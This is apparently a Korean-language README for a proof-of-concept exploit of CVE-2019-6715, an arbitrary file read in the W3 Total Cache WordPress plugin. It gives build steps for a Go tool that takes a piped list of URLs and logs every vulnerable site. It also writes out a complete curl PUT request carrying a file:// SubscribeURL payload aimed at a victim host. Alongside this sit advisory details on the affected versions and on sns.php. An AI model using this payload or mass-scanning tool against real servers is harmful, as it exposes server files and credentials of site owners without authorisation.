
PoC exploit for CVE-2019-6715: 조작된 SubscriptionConfirmation JSON을 통해 W3 Total Cache WordPress 플러그인에서 임의 파일 읽기. 파이프된 URL 목록을 사용하여 취약한 서버에서 파일을 읽습니다.
go get github.com/fatih/color
go build
cat list.txt | ./2019-6715
모든 취약한 URL은 text.log에 기록됩니다.
설명: WordPress용 W3 Total Cache 플러그인 0.9.4 이전 버전의 pub/sns.php는 SubscriptionConfirmation JSON 데이터의 SubscribeURL 필드를 통해 원격 공격자가 임의 파일을 읽을 수 있도록 합니다.
취약점 유형: 임의 파일 읽기
제품 공급업체: Frederick Townes의 WordPress W3 Total Cache 플러그인
영향받는 제품 코드 베이스: W3 Total Cache - 0.9.2.6 ~ 0.9.3, 0.9.4에서 수정됨
영향받는 구성 요소: 영향을 받는 소스 코드 파일: w3-total-cache/pub/sns.php
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php